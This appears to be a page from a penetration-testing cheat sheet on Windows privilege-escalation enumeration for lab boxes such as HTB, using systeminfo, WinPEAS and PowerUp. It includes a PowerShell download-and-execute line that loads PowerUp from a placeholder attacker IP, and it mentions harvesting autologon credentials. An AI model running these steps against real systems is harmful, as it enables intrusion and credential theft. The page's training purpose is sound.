> For the complete documentation index, see [llms.txt](https://heinosass.gitbook.io/leet-sheet/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://heinosass.gitbook.io/leet-sheet/post-exploitation/untitled/windows-privilege-escalation/enumeration.md).

# Enumeration

## Manual Enumeration

Get OS version:

```
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```

Get service pack version:

```
wmic os get servicepackmajorversion
```

## Automatic Enumeration

### WinPEAS

Great Windows privesc enumeration script.

{% embed url="<https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS>" %}

If you transfer the results from running the script to linux, then you can view colourized output with the **cat** command. Vim doesn't colourize it properly.

To view it with other tools, you have to convert it to UTF-8 first.

```
iconv -f utf-16le -t utf-8 winpeas.txt -o winpeas-utf-8.txt
```

After that, you can view it with **less** (ansi coloured output).&#x20;

```
less -R winpeas-utf-8.txt
```

**Caveats**:&#x20;

* When I tested this script, it wasn't able to find autologon credentials, even though PowerUp was able to find them with `Get-RegistryAutoLogon` (WinPEAS checks for them but said it didn't find any in the "Bart" box on HTB)

### PowerUp

This may catch some stuff that WinPEAS might not find, like autologon credentials.

Serve the script over HTTP:&#x20;

```
python3 -m http.server 80
```

(From Powershell) load the module into memory:&#x20;

```
IEX (New-Object Net.WebClient).DownloadString('http://YOUR_IP_ADDRESS_HERE/PowerUp.ps1');
```

Invoke all checks:&#x20;

```
Invoke-AllChecks | Out-File -Encoding ASCII powerup.txt
```

**Caveats**:&#x20;

* If you're running the script on a 64-bit machine, then [make sure you're using 64-bit Powershell](/leet-sheet/post-exploitation/untitled/cli-tips.md#switch-to-64-bit-powershell-from-32-bit).
